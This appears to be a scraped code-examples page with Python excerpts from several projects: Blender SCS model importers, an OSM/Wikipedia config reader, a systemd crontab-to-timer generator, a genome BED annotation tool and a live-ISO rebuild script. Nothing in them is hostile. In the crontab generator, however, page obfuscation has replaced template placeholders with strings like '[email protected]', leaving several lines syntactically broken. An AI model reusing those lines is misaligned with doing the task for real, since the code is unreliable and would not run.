                lprint('\nI No file found at %r!' % (_path_utils.readable_norm(filepath),))
        else:
            lprint('\nI No filepath provided!')

    # IMPORT PIT
    bpy.context.scene.objects.active = None
    if scs_globals.import_pit_file:
        pit_filepath = str(filepath[:-1] + 't')
        if os.path.isfile(pit_filepath):
            lprint('\nD PIT filepath:\n  %s', (pit_filepath,))
            # print('PIT filepath:\n  %s' % pit_filepath)
            result, loaded_variants, loaded_looks = _pit.load(pit_filepath)
        else:
            lprint('\nI No PIT file.')
            # print('INFO - No PIT file.')

    # IMPORT PIC
    if scs_globals.import_pic_file:
        pic_filepath = str(filepath[:-1] + 'c')
        if os.path.isfile(pic_filepath):
            lprint('\nD PIC filepath:\n  %s', (pic_filepath,))
            # print('PIC filepath:\n  %s' % pic_filepath)
            result, collision_locators = _pic.load(pic_filepath)
        else:
            lprint('\nI No PIC file.')
            # print('INFO - No PIC file.')

    # SETUP 'SCS GAME OBJECTS'
    for item in collision_locators:
        locators.append(item)
    for item in prefab_locators:
        locators.append(item)
    path, file = os.path.split(filepath)
    # print('  path: %r\n  file: %r' % (path, file))
    lod_name, ext = os.path.splitext(file)
    if objects or locators or (armature and skeleton):
        scs_root_object = _create_scs_root_object(lod_name, loaded_variants, loaded_looks, mats_info, objects, locators, armature)

    # IMPORT PIS
    if scs_globals.import_pis_file:
        # pis file path is created from directory of pim file and skeleton definition inside pim header
        pis_filepath = os.path.dirname(filepath) + os.sep + skeleton
        if os.path.isfile(pis_filepath):
            lprint('\nD PIS filepath:\n  %s', (pis_filepath,))

            # fill in custom data if PIS file is from other directory
            if skeleton[:-4] != scs_root_object.name:
                armature.scs_props.scs_skeleton_custom_export_dirpath = "//" + os.path.relpath(os.path.dirname(pis_filepath),
                                                                                               scs_globals.scs_project_path)
                armature.scs_props.scs_skeleton_custom_name = os.path.basename(skeleton[:-4])

            bones = _pis.load(pis_filepath, armature)
        else:
            bones = None
            lprint('\nI No PIS file.')

        # IMPORT PIA
        if scs_globals.import_pia_file and bones:
            basepath = os.path.dirname(filepath)
            # Search for PIA files in model's directory and its subdirectiories...
            lprint('\nD Searching the directory for PIA files:\n   %s', (basepath,))
            # print('\nSearching the directory for PIA files:\n   %s' % str(basepath))
            pia_files = []
            index = 0
            for root, dirs, files in os.walk(basepath):
                if not scs_globals.include_subdirs_for_pia:
                    if index > 0:
                        break
                # print('  root: %s - dirs: %s - files: %s' % (str(root), str(dirs), str(files)))
                for file in files:
                    if file.endswith(".pia"):
                        pia_filepath = os.path.join(root, file)
                        pia_files.append(pia_filepath)
                index += 1

            if len(pia_files) > 0:
                lprint('D PIA files found:')
                for pia_filepath in pia_files:
                    lprint('D %r', pia_filepath)
                # print('armature: %s\nskeleton: %r\nbones: %s\n' % (str(armature), str(skeleton), str(bones)))
                _pia.load(scs_root_object, pia_files, armature, pis_filepath, bones)
            else:
                lprint('\nI No PIA files.')

    # fix scene objects count so it won't trigger copy cycle
    bpy.context.scene.scs_cached_num_objects = len(bpy.context.scene.objects)

    # Turn on Textured Solid in 3D view...
    for bl_screen in bpy.data.screens:
        for bl_area in bl_screen.areas:
            for bl_space in bl_area.spaces:
                if bl_space.type == 'VIEW_3D':
                    bl_space.show_textured_solid = True

    # Turn on GLSL in 3D view...
    bpy.context.scene.game_settings.material_mode = 'GLSL'

    # Turn on "Frame Dropping" for animation playback...
    bpy.context.scene.use_frame_drop = True

    # FINAL FEEDBACK
    bpy.context.window.cursor_modal_restore()
    lprint('\nI Import compleeted in %.3f sec.', time.time() - t, report_errors=True, report_warnings=True)
    return True

Example 5

Project: BlenderTools
Source File: import_pmx.py
View license
def load(
        operator,
        context,
        filepath,
        ):
    import time

    t = time.time()
    bpy.context.window.cursor_modal_set('WAIT')
    # import_scale = bpy.data.worlds[0].scs_globals.import_scale
    # load_textures = bpy.data.worlds[0].scs_globals.load_textures
    # mesh_creation_type = bpy.data.worlds[0].scs_globals.mesh_creation_type
    dump_level = int(bpy.data.worlds[0].scs_globals.dump_level)

    prefab_locators = []
    objects = []
    locators = []
    armature = skeleton = None

    # ## NEW SCENE CREATION
    # if bpy.data.worlds[0].scs_globals.scs_lod_definition_type == 'scenes':
    #     if context.scene.name != 'Scene':
    #         bpy.ops.scene.new(type='NEW')

## IMPORT PMG (PIM)
    if bpy.data.worlds[0].scs_globals.import_pmg_file or bpy.data.worlds[0].scs_globals.import_pis_file:
        if filepath:
            if os.path.isfile(filepath):
                Print(dump_level, '\nD PMG filepath:\n  %s', str(filepath).replace("\\", "/"))
                # result, objects, locators, armature, skeleton = import_pmg.load(operator, context, filepath)
            else:
                Print(dump_level, '\nI No file found at %r!' % str(filepath).replace("\\", "/"))
        else:
            Print(dump_level, '\nI No filepath provided!')

# ## IMPORT PIT
#     if bpy.data.worlds[0].scs_globals.import_pit_file:
#         pit_filepath = str(filepath[:-1] + 't')
#         if os.path.isfile(pit_filepath):
#             Print(dump_level, '\nD PIT filepath:\n  %s', pit_filepath)
#             # print('PIT filepath:\n  %s' % pit_filepath)
#             result = import_pit.load(operator, context, pit_filepath)
#         else:
#             Print(dump_level, '\nI No PIT file.')
#             # print('INFO - No PIT file.')

# ## IMPORT PIC
#     if bpy.data.worlds[0].scs_globals.import_pic_file:
#         pic_filepath = str(filepath[:-1] + 'c')
#         if os.path.isfile(pic_filepath):
#             Print(dump_level, '\nD PIC filepath:\n  %s', pic_filepath)
#             # print('PIC filepath:\n  %s' % pic_filepath)
#         else:
#             Print(dump_level, '\nI No PIC file.')
#             # print('INFO - No PIC file.')

# ## IMPORT PIP
#     if bpy.data.worlds[0].scs_globals.import_pip_file:
#         pip_filepath = str(filepath[:-1] + 'p')
#         if os.path.isfile(pip_filepath):
#             Print(dump_level, '\nD PIP filepath:\n  %s', pip_filepath)
#             # print('PIP filepath:\n  %s' % pip_filepath)
#             result, prefab_locators = import_pip.load(operator, context, pip_filepath)
#         else:
#             Print(dump_level, '\nI No PIP file.')
#             # print('INFO - No PIP file.')

# ## IMPORT PIS
#     if bpy.data.worlds[0].scs_globals.import_pis_file:
#         pis_filepath = str(filepath[:-1] + 's')
#         if os.path.isfile(pis_filepath):
#             Print(dump_level, '\nD PIS filepath:\n  %s', pis_filepath)
#             # print('PIS filepath:\n  %s' % pis_filepath)
#             result, bones = import_pis.load(operator, context, pis_filepath, armature)
#         else:
#             bones = None
#             Print(dump_level, '\nI No PIS file.')
#             # print('INFO - No PIS file.')

# ## IMPORT PIA
#     if bpy.data.worlds[0].scs_globals.import_pis_file and bpy.data.worlds[0].scs_globals.import_pia_file:
#         basepath = os.path.dirname(filepath)
#         ## Search for PIA files in model's directory and its subdirectiories...
#         Print(dump_level, '\nI Searching the directory for PIA files:\n   %s', str(basepath))
#         # print('\nSearching the directory for PIA files:\n   %s' % str(basepath))
#         pia_files = []
#         index = 0
#         for root, dirs, files in os.walk(basepath):
#             if not bpy.data.worlds[0].scs_globals.include_subdirs_for_pia:
#                 if index > 0:
#                     break
#             # print('  root: %s - dirs: %s - files: %s' % (str(root), str(dirs), str(files)))
#             for file in files:
#                 if file.endswith(".pia"):
#                     pia_filepath = os.path.join(root, file)
#                     pia_files.append(pia_filepath)
#             index += 1
#
#         if len(pia_files) > 0:
#             if dump_level > 1:
#                 Print(dump_level, 'I PIA files found:')
#                 for pia_filepath in pia_files: Print(dump_level, 'I %r', pia_filepath)
#             # print('armature: %s\nskeleton: %r\nbones: %s\n' % (str(armature), str(skeleton), str(bones)))
#             result = import_pia.load(operator, context, pia_files, armature, skeleton, bones)
#             # print('  result: %s' % str(result))
#         else:
#             Print(dump_level, '\nI No PIA files.')

## SETUP LODS
    for item in prefab_locators:
        locators.append(item)
    path, file = os.path.split(filepath)
    # print('  path: %r\n  file: %r' % (path, file))
    lod_name, ext = os.path.splitext(file)
    # print('  root: %r\n  ext: %r' % (root, ext))
    # if bpy.data.worlds[0].scs_globals.scs_lod_definition_type == 'scenes':
    #     print('LODs as Scenes...')
    #     context.scene.name = lod_name
    #     context.scene.scs_props.scene_lod = True
    # else:
    print('LODs as Objects...')
    if objects:
        create_lod_empty(lod_name, objects, locators, armature, skeleton)

## SET DRAW MODES
    ## Turn on Textured Solid in 3D view...
    for bl_screen in bpy.data.screens:
        for bl_area in bl_screen.areas:
            for bl_space in bl_area.spaces:
                if bl_space.type == 'VIEW_3D':
                    bl_space.show_textured_solid = True

                    # bl_space.viewport_shade = 'WIREFRAME'
                    # bl_space.show_manipulator = True
                    bl_space.transform_orientation = 'NORMAL'
                    bl_space.transform_manipulators = {'ROTATE'}

    ## Turn on GLSL in 3D view...
    bpy.context.scene.game_settings.material_mode = 'GLSL'

## TURN ON SCS TOOLS
    # bpy.context.scene.scs_props.locator_size = 10.0 # TMP: increase locators' size

    bpy.context.window.cursor_modal_restore()
    Print(dump_level, '\nI files imported (in %.3f sec)', time.time() - t)

Example 6

View license
    def read_config(self):
        """Setup configurations
        """
        # Program version
        self.version = "v0.4"

        #Read configuration from config files
        configFile = "config.cfg"
        if not os.path.isfile(configFile):
            call("cp %s %s" % ("config.template", configFile), shell=True)
            print "* A new config file has been created:\n  %s\n\n  Fill it with the necessary information (see README.md and config.template)." % configFile
            answer = raw_input("\n  Continue? [Y/n]\n")
            if answer not in ("", "Y", "y"):
                sys.exit()
        configparser = ConfigParser.RawConfigParser()
        configparser.optionxform = str
        configparser.read(configFile)
        #country
        self.WIKIPEDIALANG = configparser.get("general", "preferred language")
        self.category_translation = configparser.get("general",
                                                     "category translation")
        self.country = configparser.get("general", "country")
        self.OSMDIR = configparser.get("general", "osmdir")
        self.COUNTRYBBOX = configparser.get("general", "osmbbox")
        self.countryPoly = os.path.join("data", "OSM", "%s.poly" % self.country)
        if not os.path.isfile(self.countryPoly):
            print "\n* Poly file is missing: \n  %s" % self.countryPoly
            sys.exit(1)
        if self.WIKIPEDIALANG == "" or self.country == "" or self.OSMDIR == "":
            print "\n* Fill in `config.cfg` file the following options: `osmdir`, `preferred language`, `country`"
            sys.exit(1)
        #regions names
        if not configparser.has_option("general", "regions names") or \
                configparser.get("general", "regions names") == "":
            self.regionsNames = []
        else:
            self.regionsNames = [r.decode("utf-8") \
            for r in configparser.get("general", "regions names").split("|")]
        # directory where html files must be copied after creation
        #(for example, Dropbox dir)
        self.OUTDIR = configparser.get("general", "outdir")
        #debugging
        self.print_categories_to_text_files = configparser.get("debug", "print categories to text files")
        self.clickable_cells = configparser.get("debug", "clickable cells")
        # user agent for requests to Wikipedia and Quick Intersections APIs
        self.user_agent = configparser.get("general", "user agent")
        if self.user_agent == "":
            sys.exit("* Error: please, fill 'user agent' option in the "
                     "config file.\n"
                     "The User-Agent will be used when making requests to "
                     "Wikipedia API and Quick Intersections.\n"
                     "User agent example: wikipedia-tags-in-osm ("
                     "https://openstreetmap.it/wikipedia-tags-in-osm; "
                     "[email protected])")
        #themes and categories
        themesAndCatsNames = {}
        for themeName in configparser.options("themes"):
            categoriesNames = [c.strip().replace(" ", "_").decode("utf-8") for c in configparser.get("themes", themeName).split("|")]
            themesAndCatsNames[themeName.replace(" ", "_").decode("utf-8")] = categoriesNames
        # Wikipedia categories data, downloaded from quick_intersection
        self.CATSCANDIR = os.path.join("data", "wikipedia", "catscan")
        self.make_dir(self.CATSCANDIR)
        #categories dates
        self.categoriesDates = {}
        catsDatesFile = os.path.join(self.CATSCANDIR, "update_dates.cfg")
        catsDatesConfigparser = ConfigParser.RawConfigParser()
        catsDatesConfigparser.optionxform = str
        if not os.path.isfile(catsDatesFile):
            catsDatesConfigparser.add_section('catscan dates')
            with open(catsDatesFile, 'wb') as configfile:
                catsDatesConfigparser.write(configfile)
        else:
            catsDatesConfigparser.read(catsDatesFile)
            for categoryName, date in catsDatesConfigparser.items("catscan dates"):
                self.categoriesDates[categoryName] = date

        # OSM data
        self.countryPBF = os.path.join(self.OSMDIR, "%s-latest.osm.pbf" % self.country)
        self.oldCountryPBF = os.path.join(self.OSMDIR, "%s.osm.pbf" % self.country)
        self.countryO5M = os.path.join(self.OSMDIR, "%s-latest.o5m" % self.country)
        self.oldCountryO5M = os.path.join(self.OSMDIR, "%s.o5m" % self.country)
        self.osmObjs = {}
        # OSM data with wikipedia tag
        self.wOSMFile = os.path.join("data", "OSM", "Wikipedia-data-in-OSM.osm")
        # OSM data SQlite database
        self.wOSMdb = os.path.join("data", "OSM", "Wikipedia-data-in-OSM.sqlite")
        # libspatialite path
        self.libspatialitePath = configparser.get("general", "libspatialite-path")
        # OSM data of foreign coountries
        self.FOREIGNOSMDIR = "/tmp/"
        # lists of categories and articles that should be ignored
        # (not geographic content)
        self.NONMAPPABLE = os.path.join("data", "wikipedia", "non_mappable")
        self.make_dir(self.NONMAPPABLE)
        for fileName in ("articles", "subcategories", "redirects"):
            fullName = os.path.join(self.NONMAPPABLE, fileName)
            if not os.path.isfile(fullName):
                open(fullName, "w").close()
        # workaround files
        workaroundDir = os.path.join("data", "workaround")
        self.make_dir(workaroundDir)
        fileName = os.path.join(workaroundDir, "tagged.csv")
        if not os.path.isfile(fileName):
            f = open(fileName, "w")
            f.write("#In case the parser doesn't discover a tagged article, \
it can be added here, so that it will anyhow appear in the webpages.\n\
#Article	nosmid,wosmid,wosmid,rosmid...")
            f.close()
        fileName = os.path.join(workaroundDir, "false_positive_tags.csv")
        if not os.path.isfile(fileName):
            f = open(fileName, "w")
            f.write("#If the script flags a correct tag as an error, write \
the tag here and it will not be detected as error anymore.")
            f.close()
        # conversions foreign articles titles - preferred language articles
        self.WIKIPEDIAANSWERS = os.path.join("data", "wikipedia", "answers")
        self.WIKIPEDIAANSWER = os.path.join(self.WIKIPEDIAANSWERS, "answer")
        self.make_dir(self.WIKIPEDIAANSWERS)
        # web pages dir
        self.HTMLDIR = 'html'
        self.make_dir(os.path.join(self.HTMLDIR, "GeoJSON"))
        self.make_dir(os.path.join(self.HTMLDIR, "json"))
        self.UPDATETIME = time.strftime("%b %d, ore %H", time.localtime())
        # stats and logs dir
        statsDir = os.path.join("data", "stats")
        self.make_dir(statsDir)
        self.make_dir(os.path.join("data", "logs"))
        # templates dir
        self.MISSINGTEMPLATESDIR = os.path.join("data", "wikipedia", "missing_templates")
        self.make_dir(self.MISSINGTEMPLATESDIR)
        self.TEMPLATESSTATUSFILE = os.path.join(self.MISSINGTEMPLATESDIR, "missing_templates.csv")

        supported_locales = configparser.get("i18n", "supported_locales")
        self.SUPPORTED_LOCALES = [lcode.strip()
                                  for lcode in supported_locales.split('|')
                                  ]

        return themesAndCatsNames

Example 7

View license
def generate_timer_unit(job, seq):
    persistent = job['P']
    command = job['c']
    parts = command.split()
    testremoved = None
    standardoutput = None
    delay = job['b']
    daemon_reload = os.path.isfile(REBOOT_FILE)

    try:
        home = pwd.getpwnam(job['u']).pw_dir
    except KeyError:
        home = None

    # perform smart substitutions for known shells
    if job['s'] in KSH_SHELLS:
        if home and command.startswith('~/'):
            command = home + command[1:]

        if (len(parts) >= 3 and
            parts[-2] == '>' and
            parts[-1] == '/dev/null'):
            command = ' '.join(parts[0:-2])
            parts = command.split()
            standardoutput='null';

        if (len(parts) >= 2 and
            parts[-1] == '>/dev/null'):
            command = ' '.join(parts[0:-1])
            parts = command.split()
            standardoutput='null';

        if (len(parts) == 6 and
            parts[0] == '[' and
            parts[1] in ['-x','-f','-e'] and
            parts[2] == parts[5] and
            parts[3] == ']' and
            parts[4] == '&&' ):
                testremoved = parts[2]
                command = ' '.join(parts[5:])
                parts = command.split()

        if (len(parts) == 5 and
            parts[0] == 'test' and
            parts[1] in ['-x','-f','-e'] and
            parts[2] == parts[4] and
            parts[3] == '&&' ):
                testremoved = parts[2]
                command = ' '.join(parts[4:])
                parts = command.split()

        if testremoved and not os.path.isfile(testremoved): return

        if (len(parts) == 6 and
            parts[0] == '[' and
            parts[1] in ['-d','-e'] and
            parts[2] == '/run/systemd/system' and
            parts[3] == ']' and
            parts[4] == '||'): return

        if (len(parts) == 5 and
            parts[0] == 'test' and
            parts[1] in ['-d','-e'] and
            parts[2] == '/run/systemd/system' and
            parts[3] == '||'): return

        # TODO: translate  'command%line1%line2%line3
        # in '/bin/echo -e line1\\nline2\\nline3 | command'
        # to be POSIX compliant

    if 'p' in job:
        hour = job['h']

        if job['p'] == 'reboot':
            if daemon_reload: return
            if delay == 0: delay = 1
            schedule = None
            persistent = False
        elif job['p'] == 'minutely':
            schedule = job['p']
            persistent = False
        elif job['p'] == 'hourly' and delay == 0:
            schedule = 'hourly'
        elif job['p'] == 'hourly':
            schedule = '*-*-* *:%s:0' % delay
            delay = 0
        elif job['p'] == 'midnight' and delay == 0:
            schedule = 'daily'
        elif job['p'] == 'midnight':
            schedule = '*-*-* 0:%s:0' % delay
        elif job['p'] in TIME_UNITS_SET and hour == 0 and delay == 0:
            schedule = job['p']
        elif job['p'] == 'daily':
            schedule = '*-*-* %s:%s:0' % (hour, delay)
        elif job['p'] == 'weekly':
            schedule = 'Mon *-*-* %s:%s:0' % (hour, delay)
        elif job['p'] == 'monthly':
            schedule = '*-*-1 %s:%s:0' % (hour, delay)
        elif job['p'] == 'quarterly':
            schedule = '*-1,4,7,10-1 %s:%s:0' % (hour, delay)
        elif job['p'] == 'semi-annually':
            schedule = '*-1,7-1 %s:%s:0' % (hour, delay)
        elif job['p'] == 'yearly':
            schedule = '*-1-1 %s:%s:0' % (hour, delay)
        else:
            try:
               if int(job['p']) > 31:
                    # workaround for anacrontab
                    schedule = '*-1/%s-1 %s:%s:0' % (int(round(job['p']/30)), hour, delay)
               else:
                    schedule = '*-*-1/%s %s:%s:0' % (int(job['p']), hour, delay)
            except ValueError:
                    log(3, 'unknown schedule in %s: %s' % (job['f'], job['l']))
                    schedule = job['p']

    else:
        dows = ','.join(job['w'])
        dows = '' if dows == '*' else dows + ' '
        if 0 in job['M']: job['M'].remove(0)
        if 0 in job['d']: job['d'].remove(0)
        if not len(job['M']) or not len(job['d']) or not len(job['h']) or not len(job['m']):
            return
        schedule = '%s*-%s-%s %s:%s:00' % (dows, ','.join(map(str, job['M'])),
                ','.join(map(str, job['d'])), ','.join(map(str, job['h'])), ','.join(map(str, job['m'])))

    if not persistent:
        unit_id = next(seq)
    else:
        unit_id = hashlib.md5()
        unit_id.update(bytes('\0'.join([schedule, command]), 'utf-8'))
        unit_id = unit_id.hexdigest()
    unit_name = "cron-%s-%s-%s" % (job['j'], job['u'], unit_id)

    if not (len(parts) == 1 and os.path.isfile(command)):
        with open('%s/%s.sh' % (TARGET_DIR, unit_name), 'w', encoding='utf8') as f:
            f.write(command)
        command=job['s'] + ' ' + TARGET_DIR + '/' + unit_name + '.sh'

    with open('%s/%s.timer' % (TARGET_DIR, unit_name), 'w' , encoding='utf8') as f:
        f.write('[Unit]\n')
        f.write('Description=[Timer] "%s"\n' % job['l'])
        f.write('Documentation=man:systemd-crontab-generator(8)\n')
        f.write('PartOf=cron.target\n')
        f.write('RefuseManualStart=true\n')
        f.write('RefuseManualStop=true\n')
        f.write('SourcePath=%s\n' % job['f'])
        if testremoved: f.write('ConditionFileIsExecutable=%s\n' % testremoved)

        f.write('\n[Timer]\n')
        f.write('Unit=%s.service\n' % unit_name)
        if schedule: f.write('OnCalendar=%s\n' % schedule)
        else:        f.write('OnBootSec=%sm\n' % delay)
        if job['a'] != 1: f.write('AccuracySec=%sm\n' % job['a'])
        if @[email protected] and persistent: f.write('Persistent=true\n')

    try:
        os.symlink('%s/%s.timer' % (TARGET_DIR, unit_name), '%s/%s.timer' % (TIMERS_DIR, unit_name))
    except OSError as e:
        if e.errno != os.errno.EEXIST:
            raise

    with open('%s/%s.service' % (TARGET_DIR, unit_name), 'w', encoding='utf8') as f:
        f.write('[Unit]\n')
        f.write('Description=[Cron] "%s"\n' % job['l'])
        f.write('Documentation=man:systemd-crontab-generator(8)\n')
        f.write('RefuseManualStart=true\n')
        f.write('RefuseManualStop=true\n')
        f.write('SourcePath=%s\n' % job['f'])
        if '"MAILTO="' in job['e']:
            pass # mails explicitely disabled
        elif not HAS_SENDMAIL and '"MAILTO=' not in job['e']:
            pass # mails automaticaly disabled
        else:
            f.write('[email protected]%i.service\n')
        if job['u'] != 'root' or job['f'] == '@[email protected]/root':
            f.write('Requires=systemd-user-sessions.service\n')
            if home: f.write('RequiresMountsFor=%s\n' % home)

        f.write('\n[Service]\n')
        f.write('Type=oneshot\n')
        f.write('IgnoreSIGPIPE=false\n')
        if schedule and delay: f.write('[email protected]@/@[email protected]/boot_delay %s\n' % delay)
        f.write('ExecStart=%s\n' % command)
        if job['e']: f.write('Environment=%s\n' % job['e'])
        if job['u'] != 'root': f.write('User=%s\n' % job['u'])
        if standardoutput: f.write('StandardOutput=%s\n' % standardoutput)
        if job['Z']:
             f.write('CPUSchedulingPolicy=idle\n')
             f.write('IOSchedulingClass=idle\n')

    return '%s.timer' % unit_name

Example 8

Project: jcvi
Source File: reformat.py
View license
def annotate(args):
    """
    %prog annotate new.bed old.bed 2> log

    Annotate the `new.bed` with features from `old.bed` for the purpose of
    gene numbering.

    Ambiguity in ID assignment can be resolved by either of the following 2 methods:
    - `alignment`: make use of global sequence alignment score (calculated by `needle`)
    - `overlap`: make use of overlap length (calculated by `intersectBed`)

    Transfer over as many identifiers as possible while following guidelines:
    http://www.arabidopsis.org/portals/nomenclature/guidelines.jsp#editing

    Note: Following RegExp pattern describes the structure of the identifier
    assigned to features in the `new.bed` file.

    new_id_pat = re.compile(r"^\d+\.[cemtx]+\S+")

    Examples: 23231.m312389, 23231.t004898, 23231.tRNA.144
    Adjust the value of `new_id_pat` manually as per your ID naming conventions.
    """
    from jcvi.utils.grouper import Grouper

    valid_resolve_choices = ["alignment", "overlap"]

    p = OptionParser(annotate.__doc__)
    p.add_option("--resolve", default="alignment", choices=valid_resolve_choices,
                 help="Resolve ID assignment based on a certain metric" \
                        + " [default: %default]")
    p.add_option("--atg_name", default=False, action="store_true",
                help="Specify is locus IDs in `new.bed` file follow ATG nomenclature" \
                        + " [default: %default]")

    g1 = OptionGroup(p, "Optional parameters (alignment):\n" \
            + "Use if resolving ambiguities based on sequence `alignment`")
    g1.add_option("--pid", dest="pid", default=35., type="float",
            help="Percent identity cutoff [default: %default]")
    g1.add_option("--score", dest="score", default=250., type="float",
            help="Alignment score cutoff [default: %default]")
    p.add_option_group(g1)

    g2 = OptionGroup(p, "Optional parameters (overlap):\n" \
            + "Use if resolving ambiguities based on `overlap` length\n" \
            + "Parameters equivalent to `intersectBed`")
    g2.add_option("-f", dest="f", default=0.5, type="float",
            help="Minimum overlap fraction (0.0 - 1.0) [default: %default]")
    g2.add_option("-r", dest="r", default=False, action="store_true",
            help="Require fraction overlap to be reciprocal [default: %default]")
    g2.add_option("-s", dest="s", default=True, action="store_true",
            help="Require same strandedness [default: %default]")
    p.add_option_group(g2)

    opts, args = p.parse_args(args)

    if len(args) != 2:
        sys.exit(not p.print_help())

    nbedfile, obedfile = args
    npf, opf = nbedfile.rsplit(".", 1)[0], obedfile.rsplit(".", 1)[0]

    # Make consolidated.bed
    cbedfile = "consolidated.bed"
    if not os.path.isfile(cbedfile):
        consolidate(nbedfile, obedfile, cbedfile)
    else:
        logging.warning("`{0}` already exists. Skipping step".format(cbedfile))

    logging.warning("Resolving ID assignment ambiguity based on `{0}`".\
            format(opts.resolve))

    if opts.resolve == "alignment":
        # Get pairs and prompt to run needle
        pairsfile = "nw.pairs"
        scoresfile = "nw.scores"
        if not os.path.isfile(pairsfile):
            get_pairs(cbedfile, pairsfile)
        else:
            logging.warning("`{0}` already exists. Checking for needle output".\
                    format(pairsfile))

        # If needle scores do not exist, prompt user to run needle
        if not os.path.isfile(scoresfile):
            logging.error("`{0}` does not exist. Please process {1} using `needle`".\
                    format(scoresfile, pairsfile))
            sys.exit()
    else:
        scoresfile = "ovl.scores"
        # Calculate overlap length using intersectBed
        calculate_ovl(nbedfile, obedfile, opts, scoresfile)

    logging.warning("`{0}' exists. Storing scores in memory".\
            format(scoresfile))
    scores = read_scores(scoresfile, opts)

    # Iterate through consolidated bed and
    # filter piles based on score
    abedline = {}

    cbed = Bed(cbedfile)
    g = Grouper()
    for c in cbed:
        accn = c.accn
        g.join(*accn.split(";"))

    nbedline = {}
    nbed = Bed(nbedfile)
    for line in nbed: nbedline[line.accn] = line

    splits = set()
    for chr, chrbed in nbed.sub_beds():
        abedline, splits = annotate_chr(chr, chrbed, g, scores, nbedline, abedline, opts, splits)

    if splits is not None:
        abedline = process_splits(splits, scores, nbedline, abedline)

    abedfile = npf + ".annotated.bed"
    afh = open(abedfile, "w")
    for accn in abedline:
        print >> afh, abedline[accn]
    afh.close()

    sort([abedfile, "-i"])

Example 9

Project: Customizer
Source File: rebuild.py
View license
def main():
    common.check_filesystem()

    # Basic sanity checks of files and paths that absolutely need to exist.
    message.sub_info('Doing sanity checks')
    lsb_file = misc.join_paths(config.FILESYSTEM_DIR, 'etc/lsb-release')
    if not os.path.isfile(lsb_file):
        raise(message.exception(lsb_file + ' does not exist'))

    isolinux_dir = misc.join_paths(config.ISO_DIR, 'isolinux')
    if not os.path.isdir(isolinux_dir):
        raise(message.exception(isolinux_dir + ' does not exist'))

    if misc.search_file('999:999', misc.join_paths(config.FILESYSTEM_DIR, 'etc/passwd')):
        raise(message.exception('User with UID 999 exists, this means automatic login will fail'))
    elif misc.search_file('999:999', misc.join_paths(config.FILESYSTEM_DIR, 'etc/group')):
        raise(message.exception('Group with GID 999 exists, this means automatic login will fail'))

    casper_dir = misc.join_paths(config.ISO_DIR, 'casper')
    if not os.path.isdir(casper_dir):
        message.sub_debug('Creating', casper_dir)
        os.makedirs(casper_dir)

    base_file = misc.join_paths(config.ISO_DIR, '.disk/base_installable')
    if os.path.isfile(misc.join_paths(config.FILESYSTEM_DIR, 'usr/bin/ubiquity')):
        if not os.path.isfile(base_file):
            message.sub_debug('Creating', base_file)
            misc.write_file(base_file, '')
    elif os.path.isfile(base_file):
        message.sub_debug('Removing', base_file)
        os.unlink(base_file)

    # Acquire distribution information from the FileSystem
    message.sub_info('Gathering information')
    arch = misc.chroot_exec(('dpkg', '--print-architecture'), prepare=False, \
        mount=False, output=True)
    distrib = common.get_value(config.FILESYSTEM_DIR + '/etc/lsb-release', \
        'DISTRIB_ID=')
    release = common.get_value(config.FILESYSTEM_DIR + '/etc/lsb-release', \
        'DISTRIB_RELEASE=')
    message.sub_debug('Architecture', arch)
    message.sub_debug('Distribution (DISTRIB_ID)', distrib)
    message.sub_debug('Release (DISTRIB_RELEASE)', release)

    # Remove files, by name, that we know we must repopulate if they exist.
    message.sub_info('Cleaning up')
    cleanup_files = ['casper/filesystem.squashfs', 'casper/initrd.lz', \
        'casper/vmlinuz', 'casper/vmlinuz.efi', 'casper/filesystem.manifest', \
        'casper/filesystem.size']
    cleanup_files.extend(glob.glob('.disk/casper-uuid-*'))
    for sfile in cleanup_files:
        full_file = misc.join_paths(config.ISO_DIR, sfile)
        if os.path.exists(full_file):
            message.sub_debug('Removing', full_file)
            os.unlink(full_file)

    # Define the checksum files, and the ISO filename.
    md5sum_iso_file = misc.join_paths(config.WORK_DIR, 'md5sum')
    sha1sum_iso_file = misc.join_paths(config.WORK_DIR, 'sha1sum')
    sha256sum_iso_file = misc.join_paths(config.WORK_DIR, 'sha256sum')
    iso_file = '%s/%s-%s-%s.iso' % (config.WORK_DIR, distrib, arch, release)
    if os.path.exists(iso_file):
        message.sub_debug('Removing', iso_file)
        os.unlink(iso_file)
    if os.path.exists(md5sum_iso_file):
        message.sub_debug('Removing', md5sum_iso_file)
        os.unlink(md5sum_iso_file)
    if os.path.exists(sha1sum_iso_file):
        message.sub_debug('Removing', sha1sum_iso_file)
        os.unlink(sha1sum_iso_file)
    if os.path.exists(sha256sum_iso_file):
        message.sub_debug('Removing', sha256sum_iso_file)
        os.unlink(sha256sum_iso_file)

    # Detect files needed for booting, the kernel, initramfs, xen and anything else.
    detect_boot()
    if not vmlinuz:
        message.sub_info('Re-installing kernel')
        misc.chroot_exec(('apt-get', 'purge', '--yes', 'linux-image*', '-q'))
        misc.chroot_exec(('apt-get', 'install', '--yes', \
            'linux-image-generic', '-q'))
        misc.chroot_exec(('apt-get', 'clean'))
    else:
        message.sub_info('Updating initramfs')
        misc.chroot_exec(('update-initramfs', '-k', 'all', '-t', '-u'))
    detect_boot()

    if not initrd or not vmlinuz:
        raise(message.exception('Missing boot file (initrd or vmlinuz)'))
    else:
        message.sub_info('Copying boot files')
        message.sub_debug('Initrd', initrd)
        message.sub_debug('Vmlinuz', vmlinuz)
        misc.copy_file(initrd, misc.join_paths(config.ISO_DIR, 'casper/initrd.lz'))
        
        # FIXME: extend to support grub
        efi_boot_entry = False
        isolinux_dir = config.ISO_DIR + '/isolinux'
        if os.path.isdir(isolinux_dir):
            for sfile in os.listdir(isolinux_dir):
                if sfile.endswith('.cfg') and misc.search_file('vmlinuz.efi', isolinux_dir + '/' + sfile):
                    message.sub_debug('Found EFI entry in isolinux conf', sfile)
                    efi_boot_entry = True
        if os.path.isdir(misc.join_paths(config.ISO_DIR, 'efi/boot')) or \
            efi_boot_entry:
            message.sub_debug('Copying EFI vmlinuz')
            misc.copy_file(vmlinuz, misc.join_paths(config.ISO_DIR, \
                'casper/vmlinuz.efi'))
            os.link(misc.join_paths(config.ISO_DIR, \
                'casper/vmlinuz.efi'), misc.join_paths(config.ISO_DIR, \
                'casper/vmlinuz'))
            # EFI Kernels are still loadable by grub, modern ISOs lack a bare vmlinuz.
            # mkisofs/genisoimage -cache-inodes reuses hard linked inodes.
        else:
            misc.copy_file(vmlinuz, misc.join_paths(config.ISO_DIR, 'casper/vmlinuz'))
            # We only need to copy the bare kernel if we're not using EFI at all.

    # Copy optional boot-enablement packages onto the ISO, if found.
    if mt86plus:
        message.sub_debug('Memtest86+ kernel', mt86plus)
